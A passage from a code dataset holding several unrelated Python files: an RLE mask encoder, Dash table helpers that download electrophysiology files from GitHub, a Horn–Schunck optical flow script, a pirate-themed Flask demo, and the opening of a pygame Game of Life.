files = getFilesByPath(out_path)\n #files = getFilesByPath(TRAIN_PATH+\"masks\\\\\")\n for file in files:\n #dat = ImageToMatrix(TRAIN_PATH+\"masks\\\\\"+file)\n dat = ImageToMatrix(out_path + file)\n dat = dat.transpose()\n dat = dat.reshape([101*101])\n str_line = \"\"\n ncount = 0\n start = 0\n for i in range(101*101):\n value = np.longlong(dat[0,i])\n if value == 1:\n if ncount == 0:\n start = i+1\n ncount =ncount +1\n if value != 1:\n if ncount > 0:\n str_line +=str(start)+\" \"+str(ncount)+\" \"\n ncount = 0\n if i == 101*101-1:\n if ncount > 0:\n str_line +=str(start)+\" \"+str(ncount)+\" \"\n ncount = 0\n __writefile(file.replace(\".png\",\"\")+\",\"+str_line,msk_fn)\n\ndef rle_encoding(fn):\n img = Image.open(fn)\n x = np.array(img.getdata(), dtype=np.uint8).reshape(img.size[::-1])\n x = x // 255\n dots = np.where(x.T.flatten() == 1)[0] # .T sets Fortran order down-then-right\n run_lengths = []\n prev = -2\n for b in dots:\n if (b > prev + 1): run_lengths.extend((b + 1, 0))\n run_lengths[-1] += 1\n prev = b\n return run_lengths\ndef run_rle_yu(out_path,msk_fn):\n __writefile(\"id,rle_mask\",msk_fn)\n files = getFilesByPath(out_path)\n #files = getFilesByPath(TRAIN_PATH+\"masks\\\\\")\n dt_lst=None\n for file in files:\n str_line = \"\"\n fn=os.path.join(out_path,file)\n dt_lst=rle_encoding(fn)\n for i in dt_lst:\n str_line=str_line+\" \"+str(i)\n __writefile(file.replace(\".png\",\"\")+\",\"+str.strip(str_line),msk_fn)\nif __name__ == '__main__':\n trian_x,trian_y =GetPathData(TRAIN_PATH)\n pass", "sub_path": "778.salt_copy/readfile_test.py", "file_name": "readfile_test.py", "file_ext": "py", "file_size_in_byte": 4343, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.chdir", "line_number": 7, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 16, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 22, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.matrix", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 31, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "numpy.longlong", "line_number": 100, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 116, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 116, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 117, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}]} +{"seq_id": "134433705", "text": "#\nimport os\nimport pandas as pd\n\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table\nimport dash_bootstrap_components as dbc\n\nimport sanpy\n\nboxBorder = \"1px gray solid\"\n\ndef getFileList(path):\n\t\"\"\"\n\tGet list of bAnalysis from path\n\n\tReturns:\n\t\tlist of bAnalysis\n\t\"\"\"\n\tbaList = []\n\tretFileList = []\n\tuseExtension = '.abf'\n\tvideoFileIdx = 0\n\n\tfileDict = {}\n\tfileDict['Type'] = 'file'\n\tfileDict['File Name'] = ''\n\t#fileDict['path'] = ''\n\tfileDict['kHz'] = ''\n\tfileDict['Duration (Sec)'] = ''\n\tfileDict['Number of Sweeps'] = ''\n\terror = False\n\tif not os.path.isdir(path):\n\t\t# ERROR\n\t\terror = True\n\n\tif not error:\n\t\tfor file in os.listdir(path):\n\t\t\tif file.startswith('.'):\n\t\t\t\tcontinue\n\t\t\tif file.endswith(useExtension):\n\t\t\t\tfullPath = os.path.join(path, file)\n\n\t\t\t\tfileDict = {} # WOW, I need this here !!!!!!!!\n\t\t\t\tfileDict['Type'] = 'file'\n\t\t\t\tfileDict['File Name'] = file\n\t\t\t\t#fileDict['path'] = fullPath\n\n\t\t\t\tba = sanpy.bAnalysis(file=fullPath)\n\n\t\t\t\tbaList.append(ba)\n\t\t\t\t'''\n\t\t\t\tif videoFileIdx == 0:\n\t\t\t\t\tprint(ba.abf.headerText)\n\t\t\t\t\tsweepUnitsC # what we are clamping (mV, pA)\n\t\t\t\t\tsweepUnitsX\n\t\t\t\t\tsweepUnitsY\n\t\t\t\t'''\n\n\t\t\t\t# TODO: get this from bAnalysis header\n\t\t\t\tbaHeader = ba.api_getHeader()\n\t\t\t\trecording_kHz = baHeader['recording_kHz'] #ba.dataPointsPerMs\n\t\t\t\tnumSweeps = len(ba.sweepList)\n\t\t\t\trecordingDur_sec = baHeader['recordingDur_sec'] #max(ba.abf.sweepX)\n\n\t\t\t\tfileDict['kHz'] = recording_kHz\n\t\t\t\tfileDict['Duration (Sec)'] = round(recordingDur_sec,3)\n\t\t\t\tfileDict['Number of Sweeps'] = numSweeps\n\n\t\t\t\tretFileList.append(fileDict)\n\t\t\t\tvideoFileIdx += 1\n\t#\n\tif len(retFileList) == 0:\n\t\tretFileList.append(fileDict)\n\n\tdf = pd.DataFrame(retFileList)\n\n\treturn df, baList\n\ndef makeCheckList(id, itemList, defaultItem=None):\n\toptions = [{'label': x, 'value': x} for x in itemList]\n\tret = dcc.Checklist(\n\t\tid=id,\n\t\tpersistence = True,\n\t\toptions=options,\n\t\tvalue=[itemList[0]],\n\t\t#labelStyle={'display': 'inline-block'}\n\t\tlabelStyle={\"margin-right\": \"15px\"}, # adds space between options list\n\t\tinputStyle={\"margin-right\": \"5px\"}, # adds space between check and its label\n\t), # Checklist\n\treturn ret\n\n# todo: put this is myDashUtil.py\ndef makeTable(id, df, height=200, row_selectable='single', defaultRow=0):\n\t\"\"\"\n\tdefaultRow: row index selected on __init__\n\t\"\"\"\n\tif df is None:\n\t\tstatDict = {'tmp':'empty'}\n\t\tdf = pd.DataFrame(columns=['Idx', 'Error'])\n\t\t#df['idx'] = [i for i in range(len(statDict.keys()))]\n\t\t#df['error'] = [x for x in statDict.keys()]\n\n\t#\n\tcolumns=[{\"name\": i, \"id\": i} for i in df.columns]\n\tdata=df.to_dict('records')\n\n\tret = dash_table.DataTable(\n\t\tid=id,\n\t\tpersistence = True,\n\t\tcolumns=columns,\n\t\tdata=data,\n\t\trow_selectable=row_selectable,\n\t\tfixed_rows={'headers': True}, # on scroll, keep headers at top\n\t\tselected_rows = [defaultRow], # default selected row\n\t\tstyle_header={\n\t\t\t'backgroundColor': 'rgb(30, 30, 50)',\n\t\t\t'fontWeight': 'bold',\n\t\t},\n\t\tstyle_cell={\n\t\t\t'textAlign': 'left',\n\t\t\t'fontSize':11, 'font-family':'sans-serif',\n\t\t\t'color': 'white', # dark theme\n\t\t\t'backgroundColor': 'rgb(30, 30, 30)',# dark theme\n\t\t\t},\n\t\tstyle_data_conditional=[\n\t\t\t{\n\t\t\t'if': {'row_index': 'odd'},\n\t\t\t#'backgroundColor': 'rgb(50, 50, 50)' # dark theme\n\t\t\t'backgroundColor': 'rgb(50, 50, 50)' # light theme\n\t\t\t}\n\t\t],\n\t\t# CSS styles to be applied to the outer table container\n\t\tstyle_table={\n\t\t\t'height': height, # hard coding height\n\t\t\t'overflowX': 'auto',\n\t\t\t'overflowY': 'auto',\n\t\t\t#'width': width\n\t\t}\n\t)\n\treturn ret\n\ndef old_test_requests():\n\t\"\"\"\n\tthis gets all files, including\n\n\thttps://api.github.com/repos/cudmore/SanPy/git/trees/master?recursive=1\n\n {\n \"path\": \"data\",\n \"mode\": \"040000\",\n \"type\": \"tree\",\n \"sha\": \"8b97ef351ea95308b524b6febb2890f000b86388\",\n \"url\": \"https://api.github.com/repos/cudmore/SanPy/git/trees/8b97ef351ea95308b524b6febb2890f000b86388\"\n },\n {\n \"path\": \"data/171116sh_0018.abf\",\n \"mode\": \"100644\",\n \"type\": \"blob\",\n \"sha\": \"5f3322b08d86458bf7ac8b5c12564933142ffd17\",\n \"size\": 2047488,\n \"url\": \"https://api.github.com/repos/cudmore/SanPy/git/blobs/5f3322b08d86458bf7ac8b5c12564933142ffd17\"\n },\n\n\tThen this url:\n\thttps://api.github.com/repos/cudmore/SanPy/git/blobs/5f3322b08d86458bf7ac8b5c12564933142ffd17\n\treturns a dict d{} with\n\n\t{\n\t \"sha\": \"5f3322b08d86458bf7ac8b5c12564933142ffd17\",\n\t \"node_id\": \"MDQ6QmxvYjE3MTA2NDA5Nzo1ZjMzMjJiMDhkODY0NThiZjdhYzhiNWMxMjU2NDkzMzE0MmZmZDE3\",\n\t \"size\": 2047488,\n\t \"url\": \"https://api.github.com/repos/cudmore/SanPy/git/blobs/5f3322b08d86458bf7ac8b5c12564933142ffd17\",\n\t \"coontent\": \"\"\n\t \"encoding\": \"base64\"\n\t }\n\n\thttps://api.github.com/repos/:owner/:repo_name/contents/:path\n\n\t\"\"\"\n\timport requests\n\timport io\n\n\t# this works\n\t'''\n\turl = \"https://github.com/cudmore/SanPy/blob/master/data/19114001.abf?raw=true\"\n\t# Make sure the url is the raw version of the file on GitHub\n\tdownload = requests.get(url).content\n\t'''\n\n\towner = 'cudmore'\n\trepo_name = 'SanPy'\n\tpath = 'data'\n\turl = f'https://api.github.com/repos/{owner}/{repo_name}/contents/{path}'\n\tresponse = requests.get(url).json()\n\tprint('response:', type(response))\n\t#print(response.json())\n\tfor idx, item in enumerate(response):\n\t\tif not item['name'].endswith('.abf'):\n\t\t\tcontinue\n\t\tprint(idx)\n\t\t# use item['git_url']\n\t\tfor k,v in item.items():\n\t\t\tprint(' ', k, ':', v)\n\n\t#\n\t# grab the first file\n\t#gitURl = response[0]['git_url']\n\t'''\n\tprint(' === gitURL:', gitURL)\n\t#download = requests.get(gitURl).content\n\tdownloadRespoonse = requests.get(gitURL).json()\n\tprint(' downloadRespoonse:', type(downloadRespoonse))\n\tcontent = downloadRespoonse['content']\n\t#print(' ', downloadRespoonse)\n\t#decoded = download.decode('utf-8')\n\t#print(' decoded:', type(decoded))\n\t'''\n\n\t# use response[0]['download_url'] to directly download file\n\t#gitURL = 'https://raw.githubusercontent.com/cudmore/SanPy/master/data/SAN-AP-example-Rs-change.abf'\n\tdownload_url = response[1]['download_url']\n\tcontent = requests.get(download_url).content\n\n\t#import base64\n\t#myBase64 = base64.b64encode(bytes(content, 'utf-8'))\n\t#myBase64 = base64.b64encode(bytes(content, 'base64'))\n\t'''\n\tmyBase64 = base64.b64encode(bytes(content, 'utf-8'))\n\tprint('myBase64:', type(myBase64))\n\t'''\n\t#decoded = content.decode('utf-8')\n\t#print(download)\n\t#import pyabf\n\tfileLikeObject = io.BytesIO(content)\n\tba = sanpy.bAnalysis(byteStream=fileLikeObject)\n\tprint(ba._abf)\n\tprint(ba.api_getHeader())\n\nif __name__ == '__main__':\n\t#test_requests()\n\tpass\n\t\n", "sub_path": "dash/myDashUtils.py", "file_name": "myDashUtils.py", "file_ext": "py", "file_size_in_byte": 6474, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.isdir", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sanpy.bAnalysis", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 77, "usage_type": "call"}, {"api_name": "dash_core_components.Checklist", "line_number": 83, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 101, "usage_type": "call"}, {"api_name": "dash_table.DataTable", "line_number": 109, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 196, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 224, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 236, "usage_type": "call"}, {"api_name": "sanpy.bAnalysis", "line_number": 237, "usage_type": "call"}]} +{"seq_id": "54227036", "text": "##Horn Schunck piksel po piksel. Izredno počasno\n\n\nimport numpy as np\nfrom PIL import Image\n\nimgFix = np.array(Image.open('C:/RV/KoncniProjekt/koncniRV/Frames/a.png').convert('L'), dtype=np.float32)\niImgMov = np.array(Image.open('C:/RV/KoncniProjekt/koncniRV/Frames/b.png').convert('L'), dtype=np.float32)\n\nI0= imgFix\nI1 = iImgMov\n\nNRows,NCols=I0.shape\nIx=np.zeros(I0.shape, dtype='float')\nIy=np.zeros(I0.shape, dtype='float')\nIt=np.zeros(I0.shape, dtype='float')\n\nevenU=np.zeros(I0.shape, dtype='float')\nevenV=np.zeros(I0.shape, dtype='float')\noddU=np.zeros(I0.shape, dtype='float')\noddV=np.zeros(I0.shape, dtype='float')\nfor y in range(NRows):\n for x in range(NCols):\n #Ix\n if (y==NRows-1) and (x==NCols-1): #če gre čez rob dam ničle\n Ix[y][x]= - 1/4*(I0[y][x]+I1[y][x])\n Iy[y][x]= - 1/4*(I0[y][x]+I1[y][x])\n It[y][x]= 1/4*(I1[y][x]) - 1/4*(I0[y][x])\n elif (y==NRows-1):\n Ix[y][x]= 1/4*(I0[y][x+1] + I1[y][x+1] + 0+0) - 1/4*(I0[y][x]+I1[y][x]+0+0)\n Iy[y][x]= - 1/4*(I0[y][x]+I1[y][x]+I0[y][x+1]+I1[y][x+1])\n It[y][x]= 1/4*(I1[y][x]+I1[y][x+1]) - 1/4*(I0[y][x]+I0[y][x+1])\n elif (x==NCols-1):\n Ix[y][x]= 1/4*(0+ 0 + 0+0) - 1/4*(I0[y][x]+I1[y][x]+I0[y+1][x]+I1[y+1][x])\n Iy[y][x]= 1/4*(I0[y+1][x] + I1[y+1][x] ) - 1/4*(I0[y][x]+I1[y][x])\n It[y][x]= 1/4*(I1[y][x]+I1[y+1][x]) - 1/4*(I0[y][x]+I0[y+1][x])\n else:\n Ix[y][x]= 1/4*(I0[y][x+1] + I1[y][x+1] + I0[y+1][x+1]+I1[y+1][x+1]) - 1/4*(I0[y][x]+I1[y][x]+I0[y+1][x]+I1[y+1][x])\n Iy[y][x]= 1/4*(I0[y+1][x] + I1[y+1][x] + I0[y+1][x+1]+I1[y+1][x+1]) - 1/4*(I0[y][x]+I1[y][x]+I0[y][x+1]+I1[y][x+1])\n It[y][x]= 1/4*(I1[y][x]+I1[y+1][x]+I1[y][x+1]+I1[y+1][x+1]) - 1/4*(I0[y][x]+I0[y+1][x]+I0[y][x+1]+I0[y+1][x+1])\n\n\n\nlamb=0.1\nT=9\nn=0\nwhile n<=T:\n for y in range(NRows):\n for x in range(NCols):\n if (n%2==1): #odd- preprečim prepisovanje podatkov\n #levi desni gornji spodnji za u\n lu=0 if x==0 else evenU[y][x-1]\n du=0 if x==NCols-1 else evenU[y][x+1]\n gu=0 if y==0 else evenU[y-1][x]\n su=0 if y==NRows-1 else evenU[y+1][x]\n\n #levi desni gornji spodnji za v\n lv=0 if x==0 else evenV[y][x-1]\n dv=0 if x==NCols-1 else evenV[y][x+1]\n gv=0 if y==0 else evenV[y-1][x]\n sv=0 if y==NRows-1 else evenV[y+1][x]\n\n u_=1/4*(lu+du+su+gu) #povprečje okoliških štirih\n v_=1/4*(lv+dv+sv+gv)\n\n alfa=(Ix[y][x]*u_+Iy[y][x]*v_ + It[y][x])/(lamb**2+(Ix[y][x])**2+(Iy[y][x])**2)\n oddU[y][x]=u_ - Ix[y][x]*alfa\n oddV[y][x]=v_ - Iy[y][x]*alfa\n else: #even\n #levi desni gornji spodnji za u\n lu=0 if x==0 else oddU[y][x-1]\n du=0 if x==NCols-1 else oddU[y][x+1]\n gu=0 if y==0 else oddU[y-1][x]\n su=0 if y==NRows-1 else oddU[y+1][x]\n\n #levi desni gornji spodnji za v\n lv=0 if x==0 else oddV[y][x-1]\n dv=0 if x==NCols-1 else oddV[y][x+1]\n gv=0 if y==0 else oddV[y-1][x]\n sv=0 if y==NRows-1 else oddV[y+1][x]\n\n u_=1/4*(lu+du+su+gu) #povprečje okoliških štirih\n v_=1/4*(lv+dv+sv+gv)\n\n alfa=(Ix[y][x]*u_+Iy[y][x]*v_ + It[y][x])/(lamb**2+(Ix[y][x])**2+(Iy[y][x])**2)\n evenU[y][x]=u_ - Ix[y][x]*alfa\n evenV[y][x]=v_ - Iy[y][x]*alfa\n n=n+1\n#print(Ix,Iy,It)\n#print(oddU,oddV)\n\nimport matplotlib.pyplot as plt\nX = np.arange(0, NCols, 1)\nY = np.arange(NRows,0, -1)#obrnjeno zaradi prikaza grafa\nU, V = oddU, oddV\nprint(U)\nfig, ax = plt.subplots()\nq = ax.quiver(X, Y, U, V)\nax.quiverkey(q, X=0.3, Y=1.1, U=10,\n label='Quiver key, length = 10', labelpos='E')\n\nplt.show()\nprint(\"done\")", "sub_path": "po_pikslih.py", "file_name": "po_pikslih.py", "file_ext": "py", "file_size_in_byte": 3612, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 8, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 8, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}]} +{"seq_id": "382901750", "text": "from random import choice\n\nfrom flask import Flask, render_template, flash, request, jsonify\nfrom wtforms import Form, TextField, TextAreaField, validators, StringField, SubmitField\n\n\napp = Flask(__name__)\napp.config.from_object(__name__)\napp.config['SECRET_KEY'] = 'bottle-o-rummmmmm'\n\n\nPIRATE_GREETINGS = ['Ahoy', 'Arr! Matey', 'Arrrrr!', \"SQWAK! 'ello\",\n\"Shiver me timbers! It's\", \"Get on to the deck\"]\n\nPIRATE_INSULTS = [\"yellow bellied, lily-livered landlubber!\",\n\"rotten sack of fermented potatoes\",\n\"rapscallion\",\n\"scallywag\"\n]\n\nPIRATE_BOOTY = {\n\"chops\": ['No compromise attitude', 'FR', 'Sales smarts'],\n\"growth\": ['Funnel metrics', 'Social Media', 'Blogs, blogs and more blogs'],\n\"communiteam\": ['Influencers','CLCC', 'Rolling paper']\n}\n\nINVALID_DECK = \"Gimme a valid deck\"\nINVALID_NAME = \"Gimme a name\"\n\n\n# forms\nclass ReusableForm(Form):\n name = TextField('Department Name:', validators=[validators.required()])\n\n\n# helpers\ndef get_department_booty(department_name):\n\n lowercase_department_name = department_name.lower()\n\n booty = PIRATE_BOOTY.get(lowercase_department_name, None)\n\n return booty\n\n\ndef get_all_departments():\n return list(PIRATE_BOOTY.keys())\n\ndef booty_error_message_generator():\n random_insult = choice(PIRATE_INSULTS)\n error_message = '{0}, ye {1}'.format(INVALID_DECK, random_insult)\n return error_message\n\ndef return_invalid_department_id_error():\n invalid_department_payload = {\"status\": False,\n \"message\": \"Please provide a department id\"}\n response = jsonify(invalid_department_payload)\n response.status_code = 400\n\n return response\n\n\n# controllers\n@app.route(\"/\")\ndef hello():\n # return \"Ahoy, Pirates!\"\n return render_template('ahoy.html')\n\n\n\n@app.route(\"/pirate/\")\n@app.route(\"/pirate/\")\ndef pirate_greet(pirate_name=None):\n\n if not pirate_name:\n\n random_insult = choice(PIRATE_INSULTS).lower()\n return \"{0}, ye {1}\".format(INVALID_NAME, random_insult)\n\n random_greeting = choice(PIRATE_GREETINGS)\n\n return \"{0} {1}!\".format(random_greeting, pirate_name.title())\n\n\n# form for getting name and corresponding pirate booty\n@app.route(\"/booty\", methods=['GET', 'POST'])\ndef department_booty():\n form = ReusableForm(request.form)\n error_message = None\n all_departments = get_all_departments()\n department_booty = None\n\n if request.method == 'POST':\n\n name = request.form.get('name', None)\n\n if form.validate():\n\n department_booty = get_department_booty(name)\n\n if department_booty is None:\n error_message = booty_error_message_generator()\n\n else:\n error_message = booty_error_message_generator()\n\n return render_template('get_booty.html', form=form,\n error_message=error_message,\n department_booty=department_booty,\n all_departments=all_departments)\n\n\n@app.route(\"/decks/\", methods=['GET', 'POST'])\ndef ithaka_decks():\n DEPARTMENT_DATA = [\n {\"name\": \"Engineering\", \"bio\": \"Bad at copywriting.\", \"id\": 1},\n {\"name\": \"Product\", \"bio\": \"Require more sleep.\", \"id\": 2},\n {\"name\": \"Growth\", \"bio\": \"Discuss about funnel conversions and throughputs.\", \"id\": 3},\n {\"name\": \"ChOps\", \"bio\": \"The secret sauce <3\", \"id\": 4},\n {\"name\": \"Business\", \"bio\": \"Onboarding vendors like a boss\", \"id\": 5},\n {\"name\": \"Communiteam\", \"bio\": \"Data and Sutta and Chai and Love\", \"id\": 6}\n ]\n\n if request.method == 'GET':\n response = jsonify(DEPARTMENT_DATA)\n response.status_code = 200\n\n\n elif request.method == 'POST':\n new_data = request.get_json('data')\n DEPARTMENT_DATA.append(new_data)\n response = jsonify(DEPARTMENT_DATA)\n response.status_code = 201\n\n # elif request.method == 'PUT':\n # if not department_id:\n # return return_invalid_department_id_error()\n #\n # if int(department_id) not in all_department_ids:\n # return return_invalid_department_id_error()\n\n # DEPARTMENT_DATA = parse_put_data(existing_all_department_data=required_department_data,\n # name=department_name)\n\n return response\n", "sub_path": "flask-demo/tgi-flask.py", "file_name": "tgi-flask.py", "file_ext": "py", "file_size_in_byte": 4117, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "wtforms.Form", "line_number": 32, "usage_type": "name"}, {"api_name": "wtforms.TextField", "line_number": 33, "usage_type": "call"}, {"api_name": "wtforms.validators.required", "line_number": 33, "usage_type": "call"}, {"api_name": "wtforms.validators", "line_number": 33, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 57, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 67, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 77, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 93, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 93, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 95, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 124, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 124, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 125, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 129, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 129, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 130, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "149935534", "text": "import pygame\nimport numpy as np\nimport random as r \nimport os \n\n# Colors used to draw the buttons \ngrey = (210, 210, 210) # the grid lines \nblack = (0, 0, 0) # alive cells \nwhite = (255, 255, 255) # dead cells \ngreen = (0, 200, 0) # start button \nred = (200, 0, 0) # pause button\nblue = (30, 144, 255) # reset button\nbright_green = (0, 255, 0) # to make the buttons light up \nbright_red = (255, 0, 0)\nbright_blue = (0, 191, 255)\n\n# The game window\nwindow_width = 716\nwindow_height = 785 \n\n# A matrix to store on/off values \nN = 65\ngrid = np.zeros((N, N)) \n\n# The cell dimensions \ncell_width = 10\ncell_height = 10\nmargin = 1 # the margin between the cells\n\nclass Life:\n \"\"\" \n A class for the cellular automaton Game of Life. It has \n two properties that determine whether the game is running\n and whether Conway's rules are being iterated.\n \n Properties\n ''''''''''\n running: logical\n If True, the game is run. The default is False. Is True \n when the main function play() is called. \n iterate: logical \n If True, the rules are applied to the grid and the Game of Life\n evolves over generations. The default is False. Is on when the user \n clicks on the START button. Is False when the user clicks on the PAUSE \n or the RESET button.\n \"\"\"\n def __init__(self):\n \"\"\" \n Constructor for the Life class. Takes no arguments. \n \"\"\"\n self.running = False \n self.iterate = False\n \n def play(self, pattern = r.randrange(1, 5, 1)):\n \"\"\" \n The main function of the game. Initiates the game by creating \n a screen with a constant window size. Draws the buttons and runs \n the event loop while responding to the buttons pressed. \n \n Parameters \n \n pattern \n Determines the initial pattern that appears on the \n screen when the game is started. It can take values between \n 1 and 4. The correspondence between the arguments and the patterns: \n \n 1 = glider \n 2 = R-pentomino \n 3 = light-weighted space ship \n 4 = pentadecathlon\n \n The default value is a randomly drawn integer. \n \"\"\"\n pygame.init() \n self.running = True # runs the while loop \n screen = pygame.display.set_mode((window_width, window_height))\n pygame.display.set_caption(\"Game of Life\")\n self.initial(pattern) # sets the initial pattern when the window opens\n while self.running == True:\n self.update()\n self.draw(screen)\n # always track the mouse position\n mouse = pygame.mouse.get_pos() \n click = pygame.mouse.get_pressed()\n # change the screen coordinates to grid coordinates\n global i # if these are not declared globally \n global j # the state function does not work \n i = mouse[1] // (cell_height + margin) # row number\n j = mouse[0] // (cell_width + margin) # column number \n for event in pygame.event.get(): \n if event.type == pygame.QUIT: # stop the loop if the user closes the window \n running = False\n pygame.quit()\n os._exit(0)\n elif click[0] == 1: # if the mouse is clicked \n # change the cell state if the mouse is on the grid \n if 0 <= i <= (N - 1): \n self.state()\n # start iterating if the start button is pressed \n elif 140 < mouse[0] < 140 + 100 and 725 < mouse[1] < 725 + 50:\n self.iterate = True \n # stop iterating if the pause button is pressed \n elif 305 < mouse[0] < 305 + 100 and 725 < mouse[1] < 725 + 50:\n self.iterate = False\n # stop and reset if the reset button is pressed \n elif 466 < mouse[0] < 466 + 100 and 725 < mouse[1] < 725 + 50:\n self.iterate = False\n self.reset()\n \n # Draw the buttons, bright if the mouse is on the button \n if 140 < mouse[0] < 140 + 100 and 725 < mouse[1] < 725 + 50:\n pygame.draw.rect(screen, bright_green, (140, 725, 100, 50))\n else: \n pygame.draw.rect(screen, green, (140, 725, 100, 50))\n\n if 305 < mouse[0] < 305 + 100 and 725 < mouse [1] < 725 + 50:\n pygame.draw.rect(screen, bright_red, (305, 725, 100, 50))\n else:\n pygame.draw.rect(screen, red, (305, 725, 100, 50))\n\n if 466 < mouse[0] < 466 + 100 and 725 < mouse [1] < 725 + 50:\n pygame.draw.rect(screen, bright_blue, (466, 725, 100, 50))\n else:\n pygame.draw.rect(screen, blue, (466, 725, 100, 50))\n \n text = pygame.font.Font(\"freesansbold.ttf\", 20)\n textSurf_1, textRect_1 = self.text_objects(\"START\", text)\n textSurf_2, textRect_2 = self.text_objects(\"PAUSE\", text)\n textSurf_3, textRect_3 = self.text_objects(\"RESET\", text)\n textRect_1.center = ((140 + (100 / 2)), (725 + (50 / 2)))\n textRect_2.center = ((305 + (100 / 2)), (725 + (50 / 2)))\n textRect_3.center = ((466 + (100 / 2)), (725 + (50 / 2)))\n screen.blit(textSurf_1, textRect_1)\n screen.blit(textSurf_2, textRect_2)\n screen.blit(textSurf_3, textRect_3)\n # update the screen\n pygame.display.update()\n \n def rules(self):\n \"\"\" \n Applies Conway's rules to the matrix of cells\n and updates the matrix over generations. \n \"\"\"\n X = 